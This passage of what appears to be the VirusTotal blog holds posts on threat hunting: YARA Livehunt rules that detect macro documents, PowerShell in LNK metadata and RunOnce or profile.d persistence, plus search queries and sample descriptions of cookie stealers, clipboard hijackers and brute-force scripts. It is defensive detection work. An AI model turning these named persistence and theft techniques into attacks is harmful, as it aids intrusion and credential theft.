margin: auto;
width: auto;
padding: auto;
display: block;
}
.img_container{
float:central;
}
.width_10 {
width: 10%;
}
.width_15 {
width: 15%;
}
.width_20 {
width: 20%;
}
.width_30 {
width: 30%;
}
.width_40 {
width: 40%;
}
.width_50 {
width: 50%;
}
.width_60 {
width: 60%;
}
.width_80 {
width: 80%;
}
.width_100 {
width: 100%;
}
ul{
margin-bottom: 5px!important;
}
.interval_12{
margin-bottom: 12px!important;
}
</style>Alexandra Martinhttp://www.blogger.com/profile/08447900589635774086noreply@blogger.comtag:blogger.com,1999:blog-6871606241422173914.post-50754540728678433452024-02-06T15:28:00.000+01:002024-02-06T15:28:40.176+01:00VT Livehunt Cheat Sheet<div class="interval_12"> Today we are happy to announce the release of our “<b>Livehunt Cheat Sheet</b>”, a guide to help you quickly implement monitoring rules in Livehunt. You can find the <b>PDF</b> <b>version</b> <a href="http://virustotal.com/go/livehunt-cheatsheet" target="_blank">here</a>.
</div>
<div class="interval_12"> VirusTotal Livehunt is a service that continuously scans all incoming indicators and notifies you when any of them matches your rules. Livehunt not only monitors files, but also <a href="https://docs.virustotal.com/docs/nethunt" target="_blank">domains, URLs, and IP addresses</a>. In this post we detail a few practical examples along with useful tips.
</div>
<br />
<h2 style="text-align: left;">VT Module</h2>
<div class="interval_12"> This YARA module was created for VT Hunting services to provide all available context data, which is structured in two main sections: metadata and behaviour (sandbox execution). You can find more information about the VT module <a href="https://docs.virustotal.com/docs/writing-yara-rules-for-livehunt#the-vt-module" target="_blank">here</a>.
</div>
<br />
<h2 style="text-align: left;">Using metadata information in Livehunt rules</h2>
<div class="interval_12"> Analysts can create rules to hunt based on the metadata information that VirusTotal gathers and processes. We are referring to hunting files by characteristics (type, size, signatures), reputation (antivirus detections, submission patterns), and even contextual details (file names, tags, etc).
</div>
<div class="interval_12"> For example, this would allow analysts to detect files of a certain type that were submitted several times from a given country, and that more than 5 antiviruses have flagged as malicious. Here you have some detailed examples:
</div>
<br />
<div class="interval_12"><u><b> Example 1: Malicious DOCX files that use macros:
</b></u></div>
<div class="interval_12"> This example defines a rule focused on detecting potentially malicious DOCX files with macros.
</div>
<div class="interval_12"> First we check the file type with <b>vt.metadata.file_type == vt.FileType.DOCX</b>.
</div>
<div class="interval_12"> The next condition (<b>vt.metadata.analysis_stats.malicious > 5</b>) matches files flagged as malicious by more than 5 antivirus engines in VirusTotal. This filters out most of the benign files, and can be adjusted according to the investigation.
</div>
<div class="interval_12"> Finally, it loops all tags given by security tools in the analysis pipeline and searches for the tag “macros”: <b>for any tag in vt.metadata.tags:(tag == “macros”)
</b></div>
<br />
<div class="my-yara-code interval_12">
<mark class="blue">import</mark> <mark class="red">"vt"</mark><br /><br />
<mark class="blue">rule</mark> malicious_docx_macros <mark class="dark-blue">{</mark><br />
<mark class="blue">meta</mark>:<br />
description = <mark class="red">"Detect malicious documents using macros."</mark><br />
<mark class="blue">condition</mark>:<br />
vt.metadata.file_type == vt.FileType.DOCX <mark class="blue">and</mark><br />
vt.metadata.analysis_stats.malicious > <mark class="green">5 </mark><mark class="blue">and</mark><br />
<mark class="blue">for any</mark> tag <mark class="blue">in</mark> vt.metadata.tags:(<mark class="red">tag == “macros”</mark>)<br />
<mark class="dark-blue">}</mark>
</div>
<br />
<div class="interval_12"><u><b> Example 2: Possible LNK execution through CommandLineArguments Exif metadata field:
</b></u></div>
<div class="interval_12"> The following rule is designed to identify <b>PowerShell</b> execution by manipulating metadata fields of <b>.lnk files</b>. This <a href="https://www.docguard.io/lnk-file-based-attacks-are-on-the-rise/" target="_blank">technique</a> is frequently utilized by malware to avoid detection and initiate attacks. For example, <a href="https://www.virustotal.com/gui/file/dc9e5e353cdd094f2446e4aa4ad0106494719866f26d486e9d69765383296198/details" target="_blank">this malicious .lnk file</a> report shows the target command line which will execute PowerShell code to download the “powercat.ps1” script.
</div>
<br />
<div class="central_img width_80 interval_12"><img height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHHeEqT_A4aaf3iGQ0cu2hyphenhyphenNXuLcBPtXDaz9zP8hjUFCJtTkTUdEF7kGwTMbpo1T0eFv6H0XflDHV6aSykUwm4n-DXOt3QwgPhYdQn1lndB413X6sETWtaZRBFSTVTpVm3nlB-2VoDA_MjLTMw5DwFWtSpmDorVBhgMzgoPvIFL_wsjU5qPcwSMK7wutg/w640-h240/lnk_metadata.png" width="640" /></div>
<br />
<div class="interval_12">In this case, the condition checks for the “powershell” string within two <b>EXIF metadata</b> fields usually used to store the powershell command line - “CommandLineArguments” and “RelativePath”: </div>
<div class="interval_12"><b>vt.metadata.exiftool["CommandLineArguments"] icontains "powershell"<br />
vt.metadata.exiftool["RelativePath"] icontains "powershell"
</b></div>
<br />
<div class="my-yara-code interval_12">
<mark class="blue">import</mark> <mark class="red">"vt"</mark><br /><br />
<mark class="blue">rule</mark> LNK_metadata_execution_powershell <mark class="dark-blue">{</mark><br />
<mark class="blue">meta</mark>:<br />
description = <mark class="red">"Detect possible LNK execution through CommandLineArguments Exif metadata field"</mark><br />
<mark class="blue">condition</mark>:<br />
vt.metadata.exiftool["CommandLineArguments"] <mark class="blue">icontains </mark><mark class="red">"powershell" </mark><mark class="blue">or</mark><br />
vt.metadata.exiftool["RelativePath"] <mark class="blue">icontains </mark><mark class="red">"powershell"</mark><br />
<mark class="dark-blue">}</mark>
<br />
</div>
<br />
<h2 style="text-align: left;">Using behaviour information in Livehunt rules</h2>
<div class="interval_12"> Dynamic analysis can bring great value on top of static one. In VirusTotal, we run executable files through multiple sandboxes and its output is normalized into a common format, which can be leveraged through the “vt” module.
</div>
<br />
<div class="interval_12"><u><b> Example 3: Malicious files that use persistence using VBScript:
</b></u></div>
<div class="interval_12"> The following rule identifies persistence under the <b>"RunOnce"</b> registry key using <b>VBS files</b>. This key allows programs to automatically execute once when a user logs in, often exploited by malware to maintain presence on a system.
</div>
<div class="interval_12"> For this rule, we iterate over <b>vt.behaviour.registry_keys_set</b> looking for <b>"\\CurrentVersion\\RunOnce\\"</b> with a value that ends with <b>".vbs"</b>.
</div>
<br />
<div class="my-yara-code interval_12">
<mark class="blue">import</mark> <mark class="red">"vt"</mark><br /><br />
<mark class="blue">rule</mark> persistence_runonce_vbs <mark class="dark-blue">{</mark><br />
<mark class="blue">meta</mark>:<br />
description = <mark class="red">"Detect persistence by establishing a VBS file in the runonce key"</mark><br />
<mark class="blue">condition</mark>:<br />
<mark class="blue">for any</mark> registry_key <mark class="blue">in </mark><br />
vt.behaviour.registry_keys_set: (registry_key.key <mark class="blue">icontains</mark><br />
<mark class="red">"\\CurrentVersion\\RunOnce\\"</mark>) <mark class="blue">and</mark> (registry_key.value <mark class="blue">endswith </mark><mark class="red">".vbs"</mark>)
<br />
<mark class="dark-blue">}</mark>
<br />
</div>
<br />
<div class="interval_12"><u><b> Example 4: Suspicious shell scripts in "profile.d" folder:
</b></u></div>
<div class="interval_12"> This rule detects activity involving the creation or modification of <b>shell scripts</b> (.sh files) within the <b>"/etc/profile.d/"</b> directory on Linux systems. This directory is often used to host scripts that automatically execute during user login, making it a common target for malware seeking persistence or automatic execution.
</div>
<div class="interval_12"> First condition iterates through files dropped (<b>vt.behaviour.files_dropped</b>) during execution as observed in VirusTotal's behavioral analysis and checks if the dropped file's path contains "/etc/profile.d/" and ends with ".sh" in order to match shell scripts.
</div>
<div class="interval_12"> The second condition is very similar but checks the file path for files written (<b>vt.behaviour.files_written</b>) during detonation.
</div>
<br />
<div class="my-yara-code interval_12">
<mark class="blue">import</mark> <mark class="red">"vt"</mark><br /><br />
<mark class="blue">rule</mark> profile_folder_shell_script <mark class="dark-blue">{</mark><br />
<mark class="blue">meta</mark>:<br />
description = <mark class="red">"Detects shell script creation in "profile.d" path."</mark><br />
<mark class="blue">condition</mark>:<br />
<mark class="blue">for any</mark> dropped <mark class="blue">in </mark>vt.behaviour.files_dropped :(<br />
dropped.path <mark class="blue">contains</mark><mark class="red">"/etc/profile.d/"</mark><br />
<mark class="blue">and</mark> dropped.path endswith
<mark class="red">".sh"</mark><br />
)<br />
<mark class="blue">or</mark>
<br />
<mark class="blue">for any</mark> file_path <mark class="blue">in </mark>vt.behaviour.files_written :(<br />
file_path <mark class="blue">contains</mark><mark class="red">"/etc/profile.d/"</mark><br />
<mark class="blue">and</mark> file_path endswith
<mark class="red">".sh"</mark><br />
)
<br />
<mark class="dark-blue">}</mark>
<br />
</div>
<br />
<h2 style="text-align: left;">Wrapping up</h2>
<div class="interval_12"> The VirusTotal (vt) YARA module brings you unprecedented flexibility in crafting Livehunt rules combining traditional file content analysis with rich metadata information and behavioral patterns from dynamic analysis.
</div>
<div class="interval_12"> Our <a href="https://www.virustotal.com/go/vti-cheatsheet" target="_blank">“VT Intelligence Cheat Sheet”</a> provides a quick guide to implement some of the most used techniques. If you have any suggestions or want to share feedback please feel free to reach out <a href="http://virustotal.com/contact" target="_blank">here</a>.
</div>
<br />
<div class="interval_12"> Happy Hunting!
</div>
<style>
.my-code{
font-family: "Courier", sans-serif;
font-size: medium;
width: 100%;
background: Black;
color: White;
/*padding: 24px;*/
border-collapse: collapse;
}
.my-yara-code{
font-family: "Courier", sans-serif;
font-size: medium;
width: 100%;
background: #F7F9F9;
color: Black;
/*padding: 24px;*/
border-collapse: collapse;
}
mark.green {
color:#3cb371;
background: none;
}
mark.gray {
color:Gray;
background: none;
}
mark.yellow {
color:Yellow;
background: none;
}
mark.orange {
color:Orange;
background: none;
}
mark.red {
color:Red;
background: none;
}
mark.blue {
color:#33BEFF;
background: none;
}
mark.dark-blue {
color:Blue;
background: none;
}
.table-container {
/*padding: 32px;*/
font-family: "Courier", sans-serif;
font-size: medium;
}
.table-container table {
width: 100%;
background: #fff;
color: #222;
/*padding: 24px;*/
border-collapse: collapse;
}
.table-container table th {
font-weight: bold!important;
text-transform: none!important;
}
th:first-child { width: 24%; }
th:first-child+th { width: 39%; }
/*
.table-container table td,
.table-container table th {
padding: 16px 32px;
}
*/
.table-container table tr {
border-bottom: 1px solid #eee;
}
@media (max-width: 580px) {
.table-container table thead {
display: none;
}
.table-container table td {
display: block;
}
}
a {
color: blue!important;
}
.central_img {
position: relative;
display: block;
margin-left: auto;
margin-right: auto;
}
.central_img img {
border: 1px solid #000000;
}
.central_img p {
text-align: center;
font-style: italic;
}
.width_20 {
width: 20%;
}
.width_30 {
width: 30%;
}
.width_40 {
width: 40%;
}
.width_50 {
width: 50%;
}
.width_60 {
width: 60%;
}
.width_80 {
width: 80%;
}
.width_100 {
width: 100%;
}
ul{
margin-bottom: 5px!important;
}
.interval_12{
margin-bottom: 12px!important;
}
</style>
Raimundo Alcázarhttp://www.blogger.com/profile/13300156415377228655noreply@blogger.com0tag:blogger.com,1999:blog-6871606241422173914.post-53355308387081921782024-01-22T17:29:00.000+01:002024-01-22T17:29:56.695+01:00Uncovering Hidden Threats with VirusTotal Code Insight<p>In the constantly changing world of cybersecurity, generative AI is becoming an increasingly valuable tool. This blog post shows various examples that elude traditional detection engines yet are adeptly unveiled by Code Insight. We explore diverse scenarios, ranging from firmware patches in DJI drones that disable red flight lights, to the covert theft of WhatsApp session cookies, phishing targeting Tesla customers, automated login attempts on the Medtronic CareLink Network, Bitcoin wallet attacks, Tik-Tok viewbots, unauthorized Netflix account access, cheaters for Roblox, and automation of Tinder’s match-making, along with a range of other scenarios.</p>
<p>Code Insight, based on <a href="https://cloud.google.com/blog/products/ai-machine-learning/duet-ai-for-developers-and-in-security-operations-now-ga" style="color: #1155cc; text-decoration: none;">Google Cloud Duet AI</a>, was unveiled at RSA Conference 2023 as a novel feature of VirusTotal. It's specialized in analyzing code snippets and generating reports in natural language from a cybersecurity and malware expert's perspective. Since its introduction, millions of files have been analyzed by Code Insight. The reports generated are readily accessible for consultation and can be leveraged through the VirusTotal Enterprise service for large-scale result aggregation and exploitation. This functionality allows security teams to quickly and efficiently examine vast amounts of code, pinpoint potential threats, and enhance their overall security posture.</p>
<p>Let's delve into some intriguing anecdotal examples that demonstrate how we can uncover threats by utilizing the reports generated by Code Insight. These instances not only showcase the tool's analytical strength but also illustrate the practical applications of its findings in real-world cybersecurity scenarios.</p>
<p>Imagine working on the cybersecurity team at Roblox and wanting to explore what Code Insight has discovered. A simple query in VT Enterprise, such as <b>codeinsight:Roblox</b>, would yield more than 2,000 related files.</p>
<center>
<div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLLYx3bUmpxVcKR8ldbgac1PYgQVX6ZiJo-zmug82YZ0vpq9F-T1AntECCWYGRInLS-pN6nXqPayIq1AdPeLe-jpOyEenrYOge7DmUxcB_cPUD9nBiADP06XywBjgXqvHKQrJ-uWH0Ya4ZkXx3_Xizm_fY1AnPYMpzJdVfErbVbY2jxCSsaMRbTF3izB4/s1600/codeinsightRoblox.png" style="display: block; padding: 1em 0; text-align: center; "><img alt="" border="0" data-original-height="862" data-original-width="1918" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLLYx3bUmpxVcKR8ldbgac1PYgQVX6ZiJo-zmug82YZ0vpq9F-T1AntECCWYGRInLS-pN6nXqPayIq1AdPeLe-jpOyEenrYOge7DmUxcB_cPUD9nBiADP06XywBjgXqvHKQrJ-uWH0Ya4ZkXx3_Xizm_fY1AnPYMpzJdVfErbVbY2jxCSsaMRbTF3izB4/s1600/codeinsightRoblox.png"/></a></div>
</center>
<br>
<p>Continuing from the previous exploration with Code Insight, let's focus even more closely. Say you're an Anti-Cheat Software Engineer at Roblox interested in the "Murder Mystery 2" game. By refining your search in VT Enterprise to <b>codeinsight:Roblox AND codeinsight:"Murder Mystery 2" AND codeinsight:cheat</b>, the results are much more specific. This refined query leads to a fascinating find - a single file.</p>
<center>
<div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJOl4JnZWzL9Nq8rMxmZyVWkMX24Nw4qD-CS_Mex1wUCsvMIlH87C6rD7Nww7Z-M533CuEFAwud2OOcdanaK76qxtNw-jG2OCIOgs2aPPHOF924edkoS3qQOk3xYlS0MGEYlDb12CDI0QbAYY682tyu6v9HD3sb2bgH27ZD6rekaZPDISbYql4Gs0jXUc/s1600/cheatmisteryRoblox.png" style="display: block; padding: 1em 0; text-align: center; "><img alt="" border="0" data-original-height="441" data-original-width="1911" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJOl4JnZWzL9Nq8rMxmZyVWkMX24Nw4qD-CS_Mex1wUCsvMIlH87C6rD7Nww7Z-M533CuEFAwud2OOcdanaK76qxtNw-jG2OCIOgs2aPPHOF924edkoS3qQOk3xYlS0MGEYlDb12CDI0QbAYY682tyu6v9HD3sb2bgH27ZD6rekaZPDISbYql4Gs0jXUc/s1600/cheatmisteryRoblox.png"/></a></div>
</center>
<br>
<p>Initially received by VirusTotal as a text file, Code Insight correctly classifies it as a Lua script and provides a detailed report on its functionality. This example demonstrates Code Insight's precision in identifying and analyzing content within a specific context, proving invaluable for targeted cybersecurity investigations.</p>
<center>
<div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEik0wnpw7EF_DEUPu7W_jLX6uvgg0S4UDhUloD6WZVOkgg81wpHQZyhlsTMHwFZ-Zk5z_E-bIYky_GVM4D8RH1ySYuzp0z0V64DEosXkP4WA0p9dKz95vnTahQbyDbyoFmAu2yAV44YYDfqZO8Gy3YMRFNHNBBV7qUY_qeMR-9RuMPx4D2c7ssTgUO4gkE/s1600/luacheaterRoblox.png" style="display: block; padding: 1em 0; text-align: center; "><img alt="" border="0" data-original-height="1382" data-original-width="1424" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEik0wnpw7EF_DEUPu7W_jLX6uvgg0S4UDhUloD6WZVOkgg81wpHQZyhlsTMHwFZ-Zk5z_E-bIYky_GVM4D8RH1ySYuzp0z0V64DEosXkP4WA0p9dKz95vnTahQbyDbyoFmAu2yAV44YYDfqZO8Gy3YMRFNHNBBV7qUY_qeMR-9RuMPx4D2c7ssTgUO4gkE/s1600/luacheaterRoblox.png"/></a></div>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<a href="https://www.virustotal.com/gui/file/6cc2daf625f329f10c0771eea5924d868edf5445de6565acdd2e02d9c89f70b6/detection" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Arial; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: xx-small;">6cc2daf625f329f10c0771eea5924d868edf5445de6565acdd2e02d9c89f70b6</span></span></a></p><h3 dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 8pt;">
</center>
<p>Shifting our focus, let's say we are now investigating a technique used to modify the firmware of DJI drones that turns off LED lights during flight. To discover if Code Insight has identified such modifications, we could use a targeted VT Enterprise search: <b>codeinsight:DJI AND codeinsight:firmware AND codeinsight:lights</b>. Voilà, the search results reveal this:</p>
<center>
<div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdm1bIaVEsrm3YCrkWqXpiDQ0rRRStAQ6m2puBgBZq3pInQ2o_x3jeQ7eKnJYXJT96qe_dyWyfVvFJVv41plIChMPZ8daAArCpBioooFzGNK9vZjl8ujm1_y2owb7jXq6NrAQePrPmouWehB4HE5XZfMnuTbeOmiCW292ILQ9Mz5VblJ6NyigJKMKjYV0/s1600/DJI.png" style="display: block; padding: 1em 0; text-align: center; "><img alt="" border="0" data-original-height="1400" data-original-width="1414" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdm1bIaVEsrm3YCrkWqXpiDQ0rRRStAQ6m2puBgBZq3pInQ2o_x3jeQ7eKnJYXJT96qe_dyWyfVvFJVv41plIChMPZ8daAArCpBioooFzGNK9vZjl8ujm1_y2owb7jXq6NrAQePrPmouWehB4HE5XZfMnuTbeOmiCW292ILQ9Mz5VblJ6NyigJKMKjYV0/s1600/DJI.png"/></a></div>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<a href="https://www.virustotal.com/gui/file/eb252a56cdfe3c66ba45b4a87863d0dafb18dce49ea42bcbb766e769dbba9e6e/detection" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Arial; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: xx-small;">eb252a56cdfe3c66ba45b4a87863d0dafb18dce49ea42bcbb766e769dbba9e6e</span></span></a></p><h3 dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 8pt;">
</center>
<p>As the previous examples demonstrate, locating interesting samples through the “codeinsight:” operator is remarkably easy. This is largely due to the fact that the searches are conducted within the natural language reports generated by AI, which analyze the code and functionality of files. This approach significantly simplifies the task of finding relevant cybersecurity threats. </p>
<p>Next, we'll present more intriguing cases that have been detected using Code Insight, further showcasing its effectiveness in the cybersecurity landscape:
.</p>
<p><b>Stealing cryptocurrency by replacing addresses from the clipboard</b></p>
<center>
<div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhT6KAU7phEgWsJslfl9u8zYL5LABHqA7tuWnyzbk4oRN4EDKfTHYZK8ZR3tnJQ4y6YS-l5lLFFIm64rPY02gKS-KLFYN7-MZhwsdr7GbUcCsVhEkCAwyk6nTUJcu77rEtKrMOztNaGHXcsFaS0fyE0DJDLdg1Yjb_2SUM8i3BujC3vBCgD6z7-HhkG1tM/s1600/cripto.png" style="display: block; padding: 1em 0; text-align: center; "><img alt="" border="0" data-original-height="1052" data-original-width="1665" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhT6KAU7phEgWsJslfl9u8zYL5LABHqA7tuWnyzbk4oRN4EDKfTHYZK8ZR3tnJQ4y6YS-l5lLFFIm64rPY02gKS-KLFYN7-MZhwsdr7GbUcCsVhEkCAwyk6nTUJcu77rEtKrMOztNaGHXcsFaS0fyE0DJDLdg1Yjb_2SUM8i3BujC3vBCgD6z7-HhkG1tM/s1600/cripto.png"/></a></div>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<a href="https://www.virustotal.com/gui/file/0cf3a43dca5fdb2df9fd6743c8ecac228c1b27823ad0134fc92f384c6b497245/detection" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Arial; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: xx-small;">0cf3a43dca5fdb2df9fd6743c8ecac228c1b27823ad0134fc92f384c6b497245</span></span></a></p><h3 dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 8pt;">
</center>
<p><b>Script that automates the process of logging into the Medtronic CareLink Network</b></p>
<center>
<div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhV9HHKEjp8p6mx6aH6vQD_0d2T0gzPZ9wJZQpefr7bUfh0KEa3bFmpK4jizxDX_Z-sBYMZjme40123LyJAITv5SGtGf8uZL1hOjT5OTiBBunR5f-b_My7ZJ7t0Ej-UFio9knSmPJJNCt0Ycb6OSOAuwOMCPlkNHMhqeRgRKABkBkJznCLFB-hXHpe72NI/s1600/medtronic.png" style="display: block; padding: 1em 0; text-align: center; "><img alt="" border="0" data-original-height="1052" data-original-width="1665" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhV9HHKEjp8p6mx6aH6vQD_0d2T0gzPZ9wJZQpefr7bUfh0KEa3bFmpK4jizxDX_Z-sBYMZjme40123LyJAITv5SGtGf8uZL1hOjT5OTiBBunR5f-b_My7ZJ7t0Ej-UFio9knSmPJJNCt0Ycb6OSOAuwOMCPlkNHMhqeRgRKABkBkJznCLFB-hXHpe72NI/s1600/medtronic.png"/></a></div>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<a href="https://www.virustotal.com/gui/file/56742933e6384a2911a4f27ab14c927941ece836f34e5fa7699caf17f4a1dd72/detection" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Arial; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: xx-small;">56742933e6384a2911a4f27ab14c927941ece836f34e5fa7699caf17f4a1dd72</span></span></a></p><h3 dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 8pt;">
</center>
<p><b>Script that steals WhatsApp session cookies</b></p>
<center>
<div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifEXDdJxJU27jnEmlsddtw0nrtirJqHl0qcTuZAPuPBeIh8WUQmjNcYuWeX6N77mntId1irEtjLO5-ykYdXPnUytdpcbNisuB4QFSsT4JVcjAV0cb23p8N56hvgZ0R83s8wb1HFejtU8IUl5aWFxL23sP8M9pIiYoZuBTdXY7JbE1FYzq0wg-tPF-ZyJw/s1600/whatsapp.png" style="display: block; padding: 1em 0; text-align: center; "><img alt="" border="0" data-original-height="560" data-original-width="1377" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifEXDdJxJU27jnEmlsddtw0nrtirJqHl0qcTuZAPuPBeIh8WUQmjNcYuWeX6N77mntId1irEtjLO5-ykYdXPnUytdpcbNisuB4QFSsT4JVcjAV0cb23p8N56hvgZ0R83s8wb1HFejtU8IUl5aWFxL23sP8M9pIiYoZuBTdXY7JbE1FYzq0wg-tPF-ZyJw/s1600/whatsapp.png"/></a></div>
<a href="https://www.virustotal.com/gui/file/4d128460d2426ba0a47dfe70b3d54ee6e9d331c7889bef61974b3fd5af0e38c3/detection" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Arial; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: xx-small;">4d128460d2426ba0a47dfe70b3d54ee6e9d331c7889bef61974b3fd5af0e38c3</span></span></a></p><h3 dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 8pt;">
</center>
<p>More examples:</p>
<ul>
<li><a href="https://www.virustotal.com/gui/file/03387893f1e30c0ccec9919830941059cb796ff4b6e772d825105e37cc42cd78/detection">Script to to increase the number of views on a TikTok video</a></li>
<li><a href="https://www.virustotal.com/gui/file/5058f7b5491292915818ecbfabb82dbe3337ff68588b8825a21bd8584d1cc27e/detection">Dictionary Attack on Netflix Accounts</a></li>
<li><a href="https://www.virustotal.com/gui/file/7e24f3171eb20b7ec056fb8bde67b4bfd3e79fafa9383ac6a1498bbfc337dc65/detection">Tinder bot</a></li>
<li><a href="https://www.virustotal.com/gui/file/67d951f13328acf139ea5d814e3cba97e22f3d4279e60a142832e7cffc7d545b/detection">Brute-Force Attack on Instagram Accounts</a></li>
<li><a href="https://www.virustotal.com/gui/file/6b58b1ec57cada88c6aad0de890ee3ed901cb76066bc6e6c073e65952b77d6da/detection">Phishing Message Script for Tesla Customers</a></li>
<li><a href="https://www.virustotal.com/gui/file/a63b90695709875b8721c9498b09e8fd0b94bf187df602048c562383bdcec06e/detection">Brute-Force Bitcoin private key generator</a></li>
</ul>
<p>These are just a few examples of how Code Insight can augment our threat intelligence processes and assist in identifying new targeted threats. We encourage you to try it in your investigations, experiencing its capabilities in enhancing your cybersecurity efforts. Stay tuned, as we will soon announce new features for Code Insight. Until then, happy hunting!</p>
Bernardo.Quinterohttp://www.blogger.com/profile/17288490159411812678noreply@blogger.com0tag:blogger.com,1999:blog-6871606241422173914.post-51740422234388210082024-01-01T12:30:00.004+01:002024-01-01T12:30:00.143+01:00Monitoring malware trends with VT Intelligence<div class="interval_12">Please note that this blogpost is part of our #VTMondays series, check out our collection of past publications <a href="https://blog.virustotal.com/2023/12/vtmondays-index.html" target="_blank">here</a>.</div>
<div class="interval_12"><a href="https://www.virustotal.com/gui/home/search" target="_blank">VT Intelligence</a> can be a powerful tool for monitoring malware trends, enhancing your detection capabilities and enabling proactive defense against evolving threats. To leverage it effectively, analysts can refine searches with threat indicators relevant to their business, technologies and to the malware trends occurring at the moment. Analysts can use this intelligence to identify and hunt emerging malicious samples and investigate new trends and capabilities. </div>
<br />
<div class="interval_12">To begin with a simple query we will search for new files <b>(“entity:files”)</b> first seen during the last week <b>(“fs:7d+”)</b> and detected by AV vendors as keylogger <b>(“engines:keylogger”)</b> with more than 5 positives <b>(“p:5+”)</b>.</div>
<div class="my-yara-code interval_12" style="text-align: center;"><a href="https://www.virustotal.com/gui/search/entity%253Afile%2520engines%253Akeylogger%2520p%253A5%252B%2520fs%253A7d%252B/files" target="_blank">entity:file engines:keylogger p:5+ fs:7d+</a></div>
<br />
<div class="interval_12">In our second query we search for fresh <b>(“fs:7d+”)</b> Windows, Linux or MacOS files <b>(“type:peexe or type:elf or type:macho”)</b>. To focus on popular/emerging malware, we will use the submissions modifier with a relatively high number <b>(“submissions:10+”)</b>, these thresholds serve as illustrative examples and can be adjusted according to the investigation.</div>
<div class="my-yara-code interval_12" style="text-align: center;"><a href="https://www.virustotal.com/gui/search/entity%253Afile%2520p%253A10%252B%2520(type%253Apeexe%2520or%2520type%253Aelf%2520or%2520type%253Amacho)%2520fs%253A7d%252B%2520submissions%253A10%252B/files" target="_blank">entity:file p:10+ (type:peexe or type:elf or type:macho) fs:7d+ submissions:10+</a></div>
<br />
<div class="interval_12">Finally, we will look for Zip files <b>(“type:zip”)</b> that potentially contain ransomware. For discriminating using verdict of AV engines we use the <b>“engines”</b> keyword <b>(“engines:ransom or engines:ransomware”)</b> and use both <b>“ransom”</b> and <b>“ransomware”</b> strings as some engines use different criteria for verdicts. An alternative way of detecting ransomware is through dedicated YARA rules <b>(“crowdsourced_yara_rule:ransomware”)</b>.</div>
<div class="my-yara-code interval_12" style="text-align: center;"><a href="https://www.virustotal.com/gui/search/entity%253Afile%2520type%253Azip%2520fs%253A7d%252B%2520(engines%253Aransom%2520or%2520engines%253Aransomware%2520or%2520crowdsourced_yara_rule%253Aransomware)/files" target="_blank">entity:file type:zip fs:7d+ (engines:ransom or engines:ransomware or crowdsourced_yara_rule:ransomware)</a></div>
<br />
<div class="interval_12">You can learn more about file search modifiers in the <a href="https://docs.virustotal.com/docs/file-search-modifiers" target="_blank">documentation</a>. </div>
<div class="interval_12"> As always, we would like to <a href="http://virustotal.com/contact" target="_blank">hear from you</a>. </div>
<div class="interval_12"> Happy hunting! </div>
<style>
.my-code{
font-family: "Courier", sans-serif;
font-size: medium;
width: 100%;
background: Black;
color: White;
/*padding: 24px;*/
border-collapse: collapse;
}
.my-yara-code{
font-family: "Courier", sans-serif;
font-size: medium;
width: 100%;
background: #F7F9F9;
color: Black;
/*padding: 24px;*/
border-collapse: collapse;
text-align: center;
}
mark.green {
color:#3cb371;
background: none;
}
mark.gray {
color:Gray;
background: none;
}
mark.yellow {
color:Yellow;
background: none;
}
mark.orange {
color:Orange;
background: none;
}
mark.red {
color:Red;
background: none;
}
mark.blue {
color:#33BEFF;
background: none;
}
mark.dark-blue {
color:Blue;
background: none;
}
.table-container {
/*padding: 32px;*/
font-family: "Courier", sans-serif;
font-size: medium;
}
.table-container table {
width: 100%;
background: #fff;
color: #222;
/*padding: 24px;*/
border-collapse: collapse;
}
.table-container table th {
font-weight: bold!important;
text-transform: none!important;
}
th:first-child { width: 24%; }
th:first-child+th { width: 39%; }
/*
.table-container table td,
